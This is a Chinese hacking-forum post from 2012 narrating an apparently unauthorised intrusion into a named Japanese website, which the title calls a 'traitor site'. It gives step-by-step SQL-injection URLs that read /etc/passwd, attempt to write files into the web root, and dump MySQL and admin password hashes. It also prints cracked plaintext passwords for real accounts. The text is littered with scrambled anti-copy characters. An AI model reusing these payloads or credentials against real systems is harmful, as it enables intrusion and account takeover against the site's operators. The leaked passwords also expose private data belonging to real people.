找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3944|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
  r% i7 n& p. z, Z% `5 \
* c  X) i1 g* @
0x01. 检测 www.zuaa.jp 收集数据
1 p! ?5 x3 `) X9 F! E
. }$ p6 ?3 V7 e# |/ J
5 A6 _: @. ^0 m2 F- B! A! gwhatweb$ L0 M4 i+ @. I# x
( c' `4 \/ y+ D& z8 c3 N

  L0 f* d4 M+ j4 b利用NMAP扫描
6 J+ G) E* t1 K8 e+ T3 O
( G  r& X7 [2 x+ K* e/ T# h中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
& M; }8 J$ f4 J2 V/ I; H0x02.找注入点
0 |& Y" y" `: M7 _2 ~% a' b3 k找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390/ S( r" Z/ r8 w- r

' g& l3 \7 d$ A& ~8 D7 M& Z6 R8 C  M2 o$ |. \: B. x) q2 V. ~, I
0x03.order by# {- h1 t$ M: ^
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1# D. X. c7 [  e: O* b

, Y8 i" K5 Q! q& T8 u: lorder by 28报错,order by 27正常
* R+ R3 X7 w7 Y, L  x
+ A' S) D4 a0 Y& \- o& s6 l2 z0x04.   union手动查询; x, F/ J2 v4 u, b# v1 h7 z
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 $ w* m+ F# B+ \3 E7 g9 z1 J
添加到 27 时正常显示 4 y3 Q, v3 U' p+ ^# A8 s5 t
9 ]1 {: \' M* _. f
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
1 K- a% n4 p1 F& n: J- _. \, l1 z) {
1 g8 y# t. D; V: X) Z0 M6 z1 B- S. K0x05. info:
1 ~- A9 J/ b# G: v) E5 n. h' H) ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 3 s+ T9 p; e) w6 q

. j8 o: V9 R# ~" guser:            root@localhost3 r% z/ A$ v& |! r2 T* |+ y
database:    openpne
1 P% y* I* m1 O$ O7 V; Iversion:      4.1.22& I& E; r. d& e* L
os:             portbld-freebsd5.4$ ]8 [9 w" p" [/ E5 K
; M. ^$ j# N( Y( G
0x06. root用户
/ N7 X" O1 s8 }利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
; L9 z. r, y. t. ~2 S5 f9 Zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
5 m- {7 {/ n; g- U) z% O( w( C' P
* ]" d; ^# _& ~2 `1 a( a+ ]通过工具转换$ D3 L8 H* Z: z4 n# v
* i. _2 a3 G' Z  v0 j/ r0 v$ q
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
! K4 o4 {0 D  D5 ?5 x
( x9 ^$ n+ Z2 E0x07. 利用 into outfile- ^: f- Y' f" J5 Q4 `, ^
全部都失败
, c. K3 G1 h* v! qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
) j( i7 K7 ]" z; l
0 v8 Y; W; V# Z0 A9 T1 {1 U' Z! Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 0 L' W- g% Q: `) n% L: y# {
+ D6 |# U3 k/ s2 u: W: Y* w2 s
页面显示“MDB2 Error:syntax error”# ]- J6 B8 }8 \* v# p# A5 q

: m( x' }+ Q. O9 i3 c- `; g0x08. 利用 mysql 4.14 J+ O& B& j. V1 E' E) Q. u2 Q
猜常规表名,字段未果 工具 sqlmap
$ o$ r8 I1 k  \中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
* {: P% w$ V# Y$ r' P
4 S9 k" @. f9 o# z, ^+ K- }" U
! U' \2 ]0 B- h( i7 u- M
4 l  A) J% [9 b9 p0x09. 查找后台
) j8 a# s7 K4 Q利用 现有的各种 后台工具尝试都不行" P4 o1 o( v! ]" X/ r
; |6 W7 c* o) Q
0x10.  MySL外联方法3 `0 _) E' v. {8 j2 D7 G
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
! g5 b( @. i# B( D$ k, d* J4 B可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user2 N/ Z0 I; `3 K5 T  L
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user' M4 b/ \2 d9 R/ c

# W- w/ }9 M5 W7 \" ^- k/ e这个可以在 www.cmd5.com 解密/ [. m) u% e" r" ]4 w
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20092 ^: S4 c  Y7 O8 R
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
% I, v* v# t9 _0 h4 @: g9 m( Zopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???  ]3 l, T/ b  e9 T3 J) e
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???0 f* Z/ l) u7 Z) O9 u  P9 y. T; B. \
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知7 a4 q+ k( ^, L, w
9 Q2 E  R/ M+ u' u' w4 G0 @

% @. I6 s, F8 Y, g  E4 y0x11. 网站突破" M  R2 s  q4 f* m4 D
发现网站的源程序 openpne, google 下载 openpne 源码6 c$ X4 L& d( @( y- c

, q( `: o) B2 @9 A$ Z. g) R0 M1 h$ \5 O4 F
0x12. 默认信息利用
5 @+ ?( X" I- H) ~http://sns.zuaa.jp/?m=admin&a=page_login* B& D5 ?6 e& u5 P2 Z7 l6 n8 I
% O: K/ j$ ]3 L9 ~
表名 (c_admin_user) ,字段名(username,password)
5 v8 f' \. v/ B, [  f: g0 C3 r/ D0 yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
) l- ]) q! J9 k! k& H: c# L+ A
2 q0 t* S# |$ u( H4 u7 h0 R解密8 U. T; A/ \7 y& ~' n
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
+ _5 b# g) N" u3 _/ A, P, ^zuaajp:c0923ec5857796a393da99905008c176,          zju1897
  v$ }' D% f6 S9 ~& ^. @$ r4 N" p# A% W, O/ k6 Z
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持4 S4 f/ o: }9 K0 f- I
  ^5 m% @* t* V
0x13. 登录后台
% N  c5 P! j; q- ?0 @/ F, m* l* Z2 K' M! R0 p$ m
, X- U; C' X5 u( K  ?
' v9 a9 I7 v/ H7 }' V
0x14. 小结
( e+ g7 o6 @! U* y6 w利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
' M2 q3 Z0 D' |1 B% Q: _5 p3 X感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
, x* s0 \- J4 o3 _------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain" e% M8 g) K6 e2 n) V) b
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持& n5 p; u' f( K+ c
, m; P3 g1 s# ^6 o
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
! K: Z  r# X( J9 G+ }: r; i) b) |

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表